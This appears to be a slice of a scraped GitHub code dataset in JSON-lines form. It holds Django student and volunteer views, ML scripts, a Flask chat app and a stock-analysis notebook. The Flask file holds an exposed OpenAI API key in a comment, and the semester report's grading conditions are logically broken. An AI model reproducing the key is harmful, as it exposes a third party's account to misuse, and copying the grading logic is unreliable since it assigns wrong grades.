= StudentSerializer(student)\n return Response(serializer.data, status=status.HTTP_200_OK)\n \n def create(self, request):\n serializer = StudentSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n \n def update(self, request, pk=None):\n student = get_object_or_404(self.queryset, pk=pk)\n serializer = StudentSerializer(student, data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n else:\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def partial_update(self, request, pk=None):\n student = get_object_or_404(self.queryset, pk=pk)\n serializer = StudentSerializer(student, data=request.data, partial=True)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n else:\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def destroy(self, request, pk=None):\n student = get_object_or_404(self.queryset, pk=pk)\n student.delete()\n return Response({\"message\": \"Student deleted successfully!\"}, status=status.HTTP_204_NO_CONTENT)\n\n\nclass StudentStatusViews(viewsets.ModelViewSet):\n\n \"\"\"view for students Status\"\"\"\n serializer_class = StudentStatusSerializer\n queryset = StudentStatus.objects.all()\n permission_classes = (IsAuthenticated, )\n\n def list(self, request):\n student_status = StudentStatus.objects.all()\n serializer = StudentStatusSerializer(student_status, many=True)\n return Response(serializer.data, status=status.HTTP_200_OK)\n \n def retrieve(self, request, pk=None):\n student_status = get_object_or_404(self.queryset, pk=pk)\n serializer = StudentStatusSerializer(student_status)\n return Response(serializer.data, status=status.HTTP_200_OK)\n \n def create(self, request):\n serializer = StudentStatusSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n \n def update(self, request, pk=None):\n student_status = get_object_or_404(self.queryset, pk=pk)\n serializer = StudentStatusSerializer(student_status, data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n else:\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def partial_update(self, request, pk=None):\n student_status = get_object_or_404(self.queryset, pk=pk)\n serializer = StudentStatusSerializer(student_status, data=request.data, partial=True)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n else:\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def destroy(self, request, pk=None):\n student_status = get_object_or_404(self.queryset, pk=pk)\n student_status.delete()\n return Response({\"message\": \"student status deleted successfully!\"}, status=status.HTTP_204_NO_CONTENT)\n\n\nclass StudentRelationContactViews(viewsets.ModelViewSet):\n\n \"\"\"view for students contact\"\"\"\n serializer_class = StudentRelationContactSerializer\n queryset = StudentRelationContact.objects.all()\n permission_classes = (IsAuthenticated, )\n\n def list(self, request):\n student_contact = StudentRelationContact.objects.all()\n serializer = StudentRelationContactSerializer(student_contact, many=True)\n return Response(serializer.data, status=status.HTTP_200_OK)\n \n def retrieve(self, request, pk=None):\n student_contact = get_object_or_404(self.queryset, pk=pk)\n serializer = StudentRelationContactSerializer(student_contact)\n return Response(serializer.data, status=status.HTTP_200_OK)\n \n def create(self, request):\n serializer = StudentRelationContactSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n \n def update(self, request, pk=None):\n student_contact = get_object_or_404(self.queryset, pk=pk)\n serializer = StudentRelationContactSerializer(student_contact, data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n else:\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def partial_update(self, request, pk=None):\n student_contact = get_object_or_404(self.queryset, pk=pk)\n serializer = StudentRelationContactSerializer(student_contact, data=request.data, partial=True)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n else:\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def destroy(self, request, pk=None):\n student_contact = get_object_or_404(self.queryset, pk=pk)\n student_contact.delete()\n return Response({\"message\": \"student contact deleted successfully!\"}, status=status.HTTP_204_NO_CONTENT)\n\n\nclass StudentHostelViews(viewsets.ModelViewSet):\n\n \"\"\"view for students hostel\"\"\"\n serializer_class = StudentHostelSerializer\n queryset = StudentHostelService.objects.all()\n permission_classes = (IsAuthenticated, )\n\n def list(self, request):\n student_hostel = StudentHostelService.objects.all()\n serializer = StudentHostelSerializer(student_hostel, many=True)\n return Response(serializer.data, status=status.HTTP_200_OK)\n \n def retrieve(self, request, pk=None):\n student_hostel = get_object_or_404(self.queryset, pk=pk)\n serializer = StudentHostelSerializer(student_hostel)\n return Response(serializer.data, status=status.HTTP_200_OK)\n \n def create(self, request):\n serializer = StudentHostelSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n \n def update(self, request, pk=None):\n student_hostel = get_object_or_404(self.queryset, pk=pk)\n serializer = StudentHostelSerializer(student_hostel, data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n else:\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def partial_update(self, request, pk=None):\n student_hostel = get_object_or_404(self.queryset, pk=pk)\n serializer = StudentHostelSerializer(student_hostel, data=request.data, partial=True)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n else:\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def destroy(self, request, pk=None):\n student_hostel = get_object_or_404(self.queryset, pk=pk)\n student_hostel.delete()\n return Response({\"message\": \"student hostel deleted successfully!\"}, status=status.HTTP_204_NO_CONTENT)\n\n\nclass StudentCartInfolViews(viewsets.ModelViewSet):\n\n \"\"\"view for students Info\"\"\"\n serializer_class = StudentsCartSerializer\n queryset = StudentNationlityCartInfo.objects.all()\n permission_classes = (IsAuthenticated, )\n\n def list(self, request):\n student_cart = StudentNationlityCartInfo.objects.all()\n serializer = StudentsCartSerializer(student_cart, many=True)\n return Response(serializer.data, status=status.HTTP_200_OK)\n \n def retrieve(self, request, pk=None):\n student_cart = get_object_or_404(self.queryset, pk=pk)\n serializer = StudentsCartSerializer(student_cart)\n return Response(serializer.data, status=status.HTTP_200_OK)\n \n def create(self, request):\n serializer = StudentsCartSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n \n def update(self, request, pk=None):\n student_cart = get_object_or_404(self.queryset, pk=pk)\n serializer = StudentsCartSerializer(student_cart, data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n else:\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def partial_update(self, request, pk=None):\n student_cart = get_object_or_404(self.queryset, pk=pk)\n serializer = StudentsCartSerializer(student_cart, data=request.data, partial=True)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n else:\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def destroy(self, request, pk=None):\n student_cart = get_object_or_404(self.queryset, pk=pk)\n student_cart.delete()\n return Response({\"message\": \"student cart info deleted successfully!\"}, status=status.HTTP_204_NO_CONTENT)\n\n\n@api_view(['GET','POST'])\ndef student_bulk_upload_view(request):\n if request.method == \"POST\":\n file = request.FILES.get(\"file\")\n \n bulk_upload = StudentBulkUpload.objects.create(\n csv_file=file\n )\n \n if bulk_upload:\n return Response({\"message\":\"file uploaded\"})\n else:\n return Response({\"message\":\"file not uploaded \"})\n\n\n@api_view(['GET'])\ndef semester_report_view(request, pk):\n student = Student.objects.get(pk=pk)\n results = []\n for result in Result.objects.all():\n if result.student == student and result.subject.semester == student.semester:\n results.append(result)\n subjects = Subject.objects.filter(department=student.department, semester=student.semester)\n \n my_courses = Course.objects.filter(students=student)\n # drawing charts for results\n courses = []\n score = []\n\n for result in results:\n if result.subject.semester == student.semester:\n courses.append(result.subject.subject)\n score.append(int(result.total_score()))\n \n total_credits = 0\n scores = 0\n percentage = 0\n passed_credits = 0\n grade = \"D\"\n\n for subject in subjects:\n total_credits += subject.credit\n\n for result in results:\n if result.subject.semester.semester_name == result.student.semester.semester_name:\n scores += result.total_score()\n if result.total_score() > 55:\n passed_credits += result.subject.credit\n if result.total_score() >= 55:\n result.is_pass = True\n else:\n result.is_pass = False\n result.save() \n if passed_credits > (total_credits // 2) and student.semester.semester_number != 8:\n student.semester.semester_number += 1\n\n for course in my_courses:\n course.students.remove(student)\n student.save()\n try:\n percentage = scores / total_credits\n except:\n percentage = 0\n\n status = \"ناکام\"\n for r in results:\n if r.total_score() < 55:\n status = \"چانس\"\n break\n else:\n status = \"کامیاب\"\n if passed_credits < (total_credits // 2):\n status = \"ناکام\"\n \n if percentage < 55:\n grade = \"F\"\n elif percentage >= 55 or percentage <= 69:\n grade = \"D\"\n elif percentage >= 70 or percentage <= 79:\n grade = \"C\"\n elif percentage >= 80 or percentage <= 89:\n grade = \"B\"\n elif percentage >= 90 or percentage <= 100:\n grade = \"A\"\n # context = {\n # \"results\": results,\n # \"student\": student,\" total_credits\": total_credits,\"scores\":scores,\" percentage\":percentage,\"passed_credits\": passed_credits,\"grade\":grade,\"score\":score,\"courses\":courses,\"status\":status\n # }\n return ","repo_name":"codingRah/mis","sub_path":"students/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":15151,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"41805702204","text":"import argparse\n\nfrom fasttrain.training_stacked_boost import train_stacked_boost\nfrom fasttrain.model.boostresnet import BoostResNetCIFAR\nfrom fasttrain.schedules import resnet_paper_schedule\n\nparser = argparse.ArgumentParser(description='Train ResNet on CIFAR10 with boosting')\nparser.add_argument('-n', '--number', type=int, default=3)\nparser.add_argument('-b', '--batch-size', type=int, default=128)\nparser.add_argument('-lr', '--learn_rate', type=float, default=0.1)\nparser.add_argument('-sd', '--stochastic-depth', type=str, default=None)\nparser.add_argument('-st', '--show-test', type=bool, default=True)\nparser.add_argument('-pa', '--pre-activated', type=bool, default=False)\nparser.add_argument('-hp', '--half-precision', type=bool, default=False)\n\nargs = parser.parse_args()\n\nstochastic_depth = None\nif args.stochastic_depth:\n sd = args.stochastic_depth\n if sd == 'true':\n stochastic_depth = {}\n else:\n splitted = sd.split('-')\n stochastic_depth = {\n 'from': float(splitted[0]),\n 'to': float(splitted[1])\n }\n\nbatch_size = args.batch_size\nn = args.number\npre_activated = args.pre_activated\nbase_lr=args.learn_rate\nshow_test = args.show_test\n\ntrain_stacked_boost(args.number,\n batch_size=args.batch_size,\n stochastic_depth=stochastic_depth,\n show_test=args.show_test,\n base_lr=args.learn_rate,\n pre_activated=args.pre_activated)\n\n","repo_name":"solomatov/cs229-project","sub_path":"scripts/resnet_stacked_boost.py","file_name":"resnet_stacked_boost.py","file_ext":"py","file_size_in_byte":1462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"42444975323","text":"from typing import Optional, Iterable\n\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.base import BaseEstimator, TransformerMixin\n\nfrom permutation.models.modelprotocol import Model\nfrom permutation.models.sklearnmodel import AbstractSKLearnModel\nfrom permutation.models.hyperparameters import HParams\n\n\nclass RF(AbstractSKLearnModel):\n \"\"\"\n Random Forest model\n\n Methods\n -------\n set_model(cls, model_dependency, hparams, preprocessing_dependencies):\n Set up the model, preprocessing pipeline and read in hyperparameters\n \"\"\"\n\n algorithm_name = \"Random Forest\"\n algorithm_abv = \"RF\"\n algorithm_type = \"Regression\"\n\n @classmethod\n def set_model(\n cls,\n model_dependency: BaseEstimator = RandomForestRegressor,\n hparams: Optional[HParams] = None,\n preprocessing_dependencies: Optional[Iterable[tuple[str, TransformerMixin]]] = None,\n ) -> Model:\n \"\"\"Set up model from config files and super class\"\"\"\n if preprocessing_dependencies is None:\n preprocessing_dependencies = []\n\n return super()._set_model(\n model_dependency=model_dependency,\n hparams=hparams,\n preprocessing_dependencies=preprocessing_dependencies,\n )\n","repo_name":"bagherilab/emulation","sub_path":"src/permutation/models/rf.py","file_name":"rf.py","file_ext":"py","file_size_in_byte":1275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"20585744894","text":"from flask import Flask, render_template, jsonify, request\nimport config\nimport openai\nimport aiapi\n\nimport pandas as pd\nimport numpy as np\n\n\ndef page_not_found(e):\n return render_template('404.html'), 404\n\n\napp = Flask(__name__)\napp.config.from_object(config.config['development'])\n\napp.register_error_handler(404, page_not_found)\n\n\n# print(\"reading embeddings for bible.org into dataframe\") \n# df2=pd.read_csv('processed/borg_embeddings.csv', index_col=0)\n# df2['embeddings'] = df2['embeddings'].replace(r'\\n',' ', regex=True)\n# df2['embeddings'] = df2['embeddings'].replace(r' ',',', regex=True)\n# df2['embeddings'] = df2['embeddings'].replace(r' ',',', regex=True)\n# df2['embeddings'] = df2['embeddings'].replace(r' ',',', regex=True)\n# df2['embeddings']=df2['embeddings'].tolist()\n\n# print(\"processing embedddings\")\n# df3=df2\n# embeddings_list = []\n\n# for i, row in df2.iterrows():\n# #print(i,row['embeddings'])\n# if row['embeddings'][1] == ',':\n# #print(\"comma detected\")\n# s=row['embeddings'][0]+row['embeddings'][2:]\n# else: \n# s=row['embeddings']\n# embeddings_list.append([float(x.strip(' []')) for x in s.split(',')])\n \n# df3['embeddings']=embeddings_list\n\n\n# ##################################################################\n# # Connect to the Milvus Vector Database (which is already running)\n# ##################################################################\n# HOST = 'localhost'\n# PORT = 19530\n# COLLECTION_NAME = 'borg_data'\n# DIMENSION = 768\n# #DIMENSION = 1536\n# #OPENAI_ENGINE = 'text-embedding-ada-002'\n\n# openai.api_key = \"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\"\n\n# INDEX_PARAM = {\n# 'metric_type':'L2',\n# 'index_type':\"HNSW\",\n# 'params':{'M': 8, 'efConstruction': 64}\n# }\n\n# QUERY_PARAM = {\n# \"metric_type\": \"L2\",\n# \"params\": {\"ef\": 64},\n# }\n\n# BATCH_SIZE = 1000\n\n# from pymilvus import connections, utility, FieldSchema, Collection, CollectionSchema, DataType\n\n# # Connect to Milvus Database\n# connections.connect(host=HOST, port=PORT)\n\n# utility.list_collections()\n# print(\"Connecting to Milvus\",COLLECTION_NAME )\n# print(\"list of milvus collections\", utility.list_collections())\n\n# # collection.is_empty\n# collection = Collection(COLLECTION_NAME)\n# collection.load()\n\n# print(\"Is Collection Empty?\",collection.is_empty)\n\n# ##################################################################\n# # Connect to the Milvus Vector Database (which is already running)\n# ##################################################################\n\n\n#print(df3.head())\n\nprint(\"starting app\")\n\n@app.route('/', methods = ['POST', 'GET'])\n\ndef index():\n\n if request.method == 'POST':\n question=request.form['prompt']\n\n res={}\n # res['answer']=aiapi.generateChatResponse(df3,prompt)\n res['answer']=aiapi.answer_question(question)\n return jsonify(res),200\n\n return render_template('index.html', **locals())\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port='8888', debug=True)\n","repo_name":"maustin10/biblechat_flask_only","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"13617186828","text":"# function to remove funky apostrophes and replace them\n# with single quotes\n\nimport glob\n\n\ndef inplace_change(filename, old_string, new_string):\n with open(filename, encoding=\"latin-1\") as f:\n s = f.read()\n if old_string not in s:\n print(f'\"{old_string}\" not found in {filename}')\n return\n\n with open(filename, 'w', encoding=\"latin-1\") as f:\n print(f'Changing \"{old_string}\" to \"{new_string}\" in {filename}')\n s = s.replace(old_string, new_string)\n f.write(s)\n\n\nfor file in glob.iglob('testcorpus/8090/*.txt'):\n inplace_change(f'{file}', '\\x92', \"'\")\n","repo_name":"stevenvandenberghe/language_of_taste","sub_path":"utils/inplace_change.py","file_name":"inplace_change.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"35660905539","text":"# -*- encoding=utf8 -*-\n__author__ = \"wb-wgz629946\"\nfrom poco.drivers.android.uiautomation import AndroidUiautomationPoco\npoco = AndroidUiautomationPoco(use_airtest_input=True, screenshot_each_action=False)\nimport time\nfrom airtest.core.api import *\nstop_app(\"com.hanweb.android.zhejiang.activity\")\nstart_app(\"com.hanweb.android.zhejiang.activity\")\ntime.sleep(10)\nresin=\"长三角无感漫游\"\nprint(type(resin))\nwhile True:\n wait(Template(r\"tpl1571208672732.png\", record_pos=(0.004, 0.089), resolution=(1080, 2340)))\n touch(Template(r\"tpl1571207083351.png\", record_pos=(0.017, 0.075), resolution=(1080, 2340)))\n time.sleep(6)\n if exists(Template(r\"tpl1571208794248.png\", record_pos=(0.018, -0.931), resolution=(1080, 2340))):\n res = poco(\"com.hanweb.android.zhejiang.activity:id/tv_title\").get_text()\n print(res)\n print(resin)\n if res == resin:\n print(\"用例通过\")\n else:\n print(\"用例失败\")\n break;\n# finally:\n# wait(Template(r\"tpl1571208794248.png\", record_pos=(0.018, -0.931), resolution=(1080, 2340)))\n# res = poco(\"com.hanweb.android.zhejiang.activity:id/tv_title\").get_text()\n# print(res)\n# if assert_equal(\"res\",\"长三角无感漫游\"):\n# print(\"用例通过\")\n \n \n ","repo_name":"jasonloverain/constantine01","sub_path":"airtest_uiauto_demo/air_case/热点关注点击长三角专区跳转.air/热点关注点击长三角专区跳转.py","file_name":"热点关注点击长三角专区跳转.py","file_ext":"py","file_size_in_byte":1290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"40705430331","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[5]:\n\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom datetime import datetime \n\n\n# In[6]:\n\n\ndf = pd.read_csv(\"NFLX.csv\")\n\n\n# In[7]:\n\n\ndf\n\n\n# In[8]:\n\n\ndf.head()\n\n\n# In[9]:\n\n\nsns.set(rc={'figure.figsize' :(10,5)})\n\n\n# # date column as index\n\n# In[10]:\n\n\ndf['Date'] = pd.to_datetime(df['Date'])\ndf= df.set_index('Date')\ndf.head()\n\n\n# # Volume of Stock Traded\n\n# In[11]:\n\n\nsns.lineplot(x=df.index, y=df['Volume'], label='Volume')\nplt.title(\"Volume of stock VS time\")\n\n\n# # Netflix stock price- High, Open, Close\n\n# In[12]:\n\n\ndf.plot(y=['High','Close','Open'],title=\"Netflix stock price\")\n\n\n# # Netflix stock price- Day, Month, Year wise\n\n# In[13]:\n\n\nfig, (ax1,ax2,ax3)=plt.subplots(3, figsize = (15,10)) \ndf.groupby(df.index.day).mean().plot(y='Volume',ax=ax1,xlabel='Day')\ndf.groupby(df.index.month).mean().plot(y='Volume',ax=ax2,xlabel='Month')\ndf.groupby(df.index.year).mean().plot(y='Volume',ax=ax3,xlabel='Year')\n\n\n# # Top 5 Dates with Highest stock price\n\n# In[14]:\n\n\na=df.sort_values(by='High', ascending=False).head(5)\na['High']\n\n\n# # Top 5 Dates with Lowest stock price\n\n# In[15]:\n\n\nb=df.sort_values(by='Low', ascending=True).head(5)\nb['Low']\n\n\n# In[19]:\n\n\nfig,axes=plt.subplots(nrows=1, ncols=2,sharex=True, figsize=(12,5))\nfig.suptitle('High & Low values stock per period of time', fontsize=18)\nsns.lineplot(ax=axes[0], y=df['High'],x=df.index, color='green')\nsns.lineplot(ax=axes[1], y=df['Low'],x=df.index, color='red')\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"pranalivalve1108/Python-Projects","sub_path":"NFLIX.py","file_name":"NFLIX.py","file_ext":"py","file_size_in_byte":1539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"1122965432","text":"from pprint import pprint\n\nfrom django.shortcuts import render, redirect, reverse, get_object_or_404\nfrom django.contrib.auth.decorators import login_required\nimport datetime\n\nfrom .models import Location, StatusUsersLocations, LogsStatusUsersLocations, User, AttendeesEvents, Event\nfrom .views_events import events_list\nfrom .forms import StatusUsersLocationsForm, UserProfileForm, MessagesEventsForm, MessagesEventsSimpleForm\nfrom .functions_global import get_date_to, forbidden_to_user, admin_only\nfrom .views_messages import get_to_user_messages, get_from_user_messages\n\n\n@login_required(login_url='/login/')\ndef index(request):\n\n to_user_messages = get_to_user_messages(request.user)\n from_user_messages = get_from_user_messages(request.user)\n\n user_distrib_pre = StatusUsersLocations.objects.filter(user=request.user, status=1) | \\\n StatusUsersLocations.objects.filter(user=request.user, status=2)\n distrib_user_choice = [i.distrib for i in user_distrib_pre if not i.distrib.is_cancelled]\n distrib_attendees = [i.parent_event for i in AttendeesEvents.objects.filter(user=request.user)]\n distrib = [i for i in distrib_user_choice]\n for i in distrib_attendees:\n if i not in distrib and not i.is_cancelled:\n distrib.append(i)\n\n if StatusUsersLocations.objects.filter(user=request.user, status=1):\n pending_events = StatusUsersLocations.objects.filter(user=request.user, status=1)\n else:\n pending_events = None\n\n events_user_manager = [i for i in Event.objects.all() if request.user in i.event_managers.all()]\n pending_approval_in_events = StatusUsersLocations.objects.filter(status=1, distrib__in=events_user_manager)\n if len(pending_approval_in_events) > 0:\n users_to_approve = True\n distrib_users_to_approve = pending_approval_in_events[0].distrib.uuid\n else:\n users_to_approve = False\n distrib_users_to_approve = None\n\n attendees = AttendeesEvents.objects.filter(user=request.user)\n\n eligible_events_date_locations_attendees_final = events_list(date_from=None, date_to=None, location=None, distrib=None, event_manager=None, attendance=True, user_requester=request.user)\n\n date_to = datetime.datetime.now() - datetime.timedelta(days=1) + datetime.timedelta(weeks=8)\n events_manager = events_list(date_from=None, date_to=date_to, location=None, event_manager=request.user, distrib=None)\n message_form = MessagesEventsForm()\n return render(request, 'index.html', context={\"events\": eligible_events_date_locations_attendees_final,\n \"date_to\": date_to, \"pending_events\":pending_events,\n \"attendees\": attendees, \"events_manager\": events_manager,\n \"message_form\": message_form, \"to_user_messages\": to_user_messages,\n \"from_user_messages\": from_user_messages,\n \"users_to_approve\":users_to_approve,\n \"distrib_users_to_approve\":distrib_users_to_approve})\n\n\ndef faq_view(request):\n return render(request, 'faq.html')\n\n\n@login_required(login_url='/login/')\n@admin_only\ndef all_users_site(request):\n users = User.objects.all().order_by('first_name')\n form = StatusUsersLocationsForm()\n message_form = MessagesEventsSimpleForm()\n status_users_location = StatusUsersLocations.objects.all().order_by('user__first_name')\n # status_users_location = StatusUsersLocations.objects.filter(status=1) | StatusUsersLocations.objects.filter(status=2)\n return render(request, 'benevoles.html', context={\"status_users_location\": status_users_location, \"form\": form, \"users\":users, \"message_form\":message_form})\n\n\n@login_required(login_url='/login/')\n@forbidden_to_user\ndef users_site(request, location_id):\n if request.user.user_type == 3 and Location.objects.get(uuid=location_id) not in Location.objects.filter(location_managers=request.user):\n return redirect('index')\n else:\n status_users_location = StatusUsersLocations.objects.filter(location=Location.objects.get(uuid=location_id),\n status=1) | StatusUsersLocations.objects.filter(\n location=Location.objects.get(uuid=location_id), status=2)\n users_pre = [i.user for i in status_users_location.order_by('user__first_name')]\n users=[]\n for i in users_pre:\n if i not in users:\n users.append(i)\n\n form = StatusUsersLocationsForm()\n message_form = MessagesEventsSimpleForm()\n\n if request.method == \"POST\":\n try:\n user_status_update = StatusUsersLocations.objects.get(uuid=request.GET['id'])\n except:\n pass\n else:\n user_status_update.status = 2\n user_status_update.save()\n logs = LogsStatusUsersLocations(location=user_status_update.location, from_user=request.user, user=user_status_update.user, status=2, current_status=user_status_update.status)\n logs.save()\n return redirect(reverse('users_site', kwargs={'location_id': location_id}))\n return render(request, 'benevoles_site.html', context={'location_id': location_id, \"status_users_location\": status_users_location, \"form\": form, \"users\":users, \"message_form\":message_form})\n\n\n@login_required(login_url='/login/')\n@forbidden_to_user\ndef user_site_update_status(request, location_id):\n if request.method == \"POST\":\n try:\n user_status_update = StatusUsersLocations.objects.get(uuid=request.GET['id'])\n except:\n pass\n else:\n user_status_update.status = request.POST['status']\n user_status_update.save()\n logs = LogsStatusUsersLocations(location=user_status_update.location, from_user=request.user, user=user_status_update.user, status=request.POST['status'], current_status=user_status_update.status)\n logs.save()\n return redirect(reverse('users_site', kwargs={'location_id': location_id}))\n return redirect('index')\n\n\n@login_required(login_url='/login/')\ndef profile(request):\n message_form = MessagesEventsSimpleForm()\n date_to = get_date_to()\n user_distrib_pre = StatusUsersLocations.objects.filter(user=request.user, status=1) | StatusUsersLocations.objects.filter(user=request.user, status=2)\n user_distrib = [i for i in user_distrib_pre if not i.distrib.is_cancelled]\n # user_locations = [i.location for i in user_locations_pre]\n user_manager_locations = Location.objects.filter(location_managers=request.user)\n return render(request, 'profile.html', context={'distrib': user_distrib, \"date_to\":date_to,\n 'manager_locations': user_manager_locations,\"message_form\":message_form })\n\n\n\n@login_required(login_url='/login/')\ndef profile_edit(request):\n form = UserProfileForm(instance=request.user)\n if request.method == \"POST\":\n form = UserProfileForm(data=request.POST)\n if form.is_valid():\n updated_user = request.user\n try:\n image = request.FILES['profile_picture']\n except:\n pass\n else:\n request.user.save_image(image)\n finally:\n updated_user.first_name = form.cleaned_data['first_name']\n updated_user.last_name = form.cleaned_data['last_name']\n updated_user.email = form.cleaned_data['email']\n updated_user.address = form.cleaned_data['address']\n updated_user.city = form.cleaned_data['city']\n updated_user.zip_code = form.cleaned_data['zip_code']\n updated_user.tel = form.cleaned_data['tel']\n updated_user.save()\n return redirect('profile')\n return render(request, 'profile_edit.html', context={\"form\" : form})\n\n\n@login_required(login_url='/login/')\n@forbidden_to_user\ndef profile_edit_manager(request, user_id, distrib_id):\n distrib = get_object_or_404(Event, uuid=distrib_id)\n if request.user.user_type == 3 and Location.objects.get(uuid=distrib.location.uuid) not in Location.objects.filter(location_managers=request.user):\n return redirect('index')\n else:\n updated_user = get_object_or_404(User, uuid=user_id)\n form = UserProfileForm(instance=updated_user)\n if request.method == \"POST\":\n form = UserProfileForm(data=request.POST)\n if form.is_valid():\n try:\n image = request.FILES['profile_picture']\n except:\n pass\n else:\n request.user.save_image(image)\n finally:\n updated_user.first_name = form.cleaned_data['first_name']\n updated_user.last_name = form.cleaned_data['last_name']\n updated_user.email = form.cleaned_data['email']\n updated_user.address = form.cleaned_data['address']\n updated_user.city = form.cleaned_data['city']\n updated_user.zip_code = form.cleaned_data['zip_code']\n updated_user.tel = form.cleaned_data['tel']\n updated_user.save()\n return redirect(reverse('distrib_users', kwargs={'distrib_id': distrib_id}))\n return render(request, 'profile_edit_manager.html', context={\"form\" : form, \"distrib\":distrib, \"user\":updated_user})\n\n\n@login_required(login_url='/login/')\n@admin_only\ndef profile_edit_admin(request, user_id):\n updated_user = get_object_or_404(User, uuid=user_id)\n form = UserProfileForm(instance=updated_user)\n if request.method == \"POST\":\n form = UserProfileForm(data=request.POST)\n if form.is_valid():\n try:\n image = request.FILES['profile_picture']\n except:\n pass\n else:\n request.user.save_image(image)\n finally:\n updated_user.first_name = form.cleaned_data['first_name']\n updated_user.last_name = form.cleaned_data['last_name']\n updated_user.email = form.cleaned_data['email']\n updated_user.address = form.cleaned_data['address']\n updated_user.city = form.cleaned_data['city']\n updated_user.zip_code = form.cleaned_data['zip_code']\n updated_user.tel = form.cleaned_data['tel']\n updated_user.save()\n return redirect(reverse('all_users_site'))\n return render(request, 'profile_edit_admin.html', context={\"form\": form, \"user\": updated_user})\n","repo_name":"tbonnard/association_benevoles","sub_path":"monespace/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"17059918768","text":"\"\"\"Script to download options data from Think or Swim (ToS) API.\"\"\"\n\n# Standard libraries\nimport pickle\nfrom datetime import datetime\nimport logging\nimport os\nimport time\nfrom typing import Dict, List\nfrom json.decoder import JSONDecodeError\nimport csv\nimport requests\nfrom requests.exceptions import ReadTimeout\nfrom urllib3.exceptions import ProtocolError\n\n# External dependencies\nfrom pymongo import MongoClient, ASCENDING\nfrom pymongo.errors import DuplicateKeyError\n\n# Application-specific imports\n\n# Constants\nTOS_OPTION_CHAIN_API_URL = \"https://api.tdameritrade.com/v1/marketdata/chains\"\nTOS_DOWNLOAD_DIR = \"/Users/edsonfox/Documents/Trading/Historical_Options_Data/ToS/\"\nCBOE_SYMBOLS_URL = \"http://markets.cboe.com/us/options/symboldir/equity_index_options/?download=csv\"\nMANDATORY_SYMBOLS = [\n \"A\",\n \"AAPL\",\n \"ABBV\",\n \"ABT\",\n \"ACN\",\n \"ADBE\",\n \"ADM\",\n \"ADP\",\n \"AFL\",\n \"AIG\",\n \"ALB\",\n \"ALL\",\n \"AMCR\",\n \"AMGN\",\n \"AMZN\",\n \"AOS\",\n \"APD\",\n \"ATO\",\n \"AXP\",\n \"AZO\",\n \"BA\",\n \"BAC\",\n \"BDX\",\n \"BEN\",\n \"BF.B\",\n \"BIIB\",\n \"BK\",\n \"BKNG\",\n \"BKX\",\n \"BLK\",\n \"BMY\",\n \"BNS\",\n \"BRK.B\",\n \"BYND\",\n \"C\",\n \"CAH\",\n \"CAT\",\n \"CB\",\n \"CHTR\",\n \"CINF\",\n \"CL\",\n 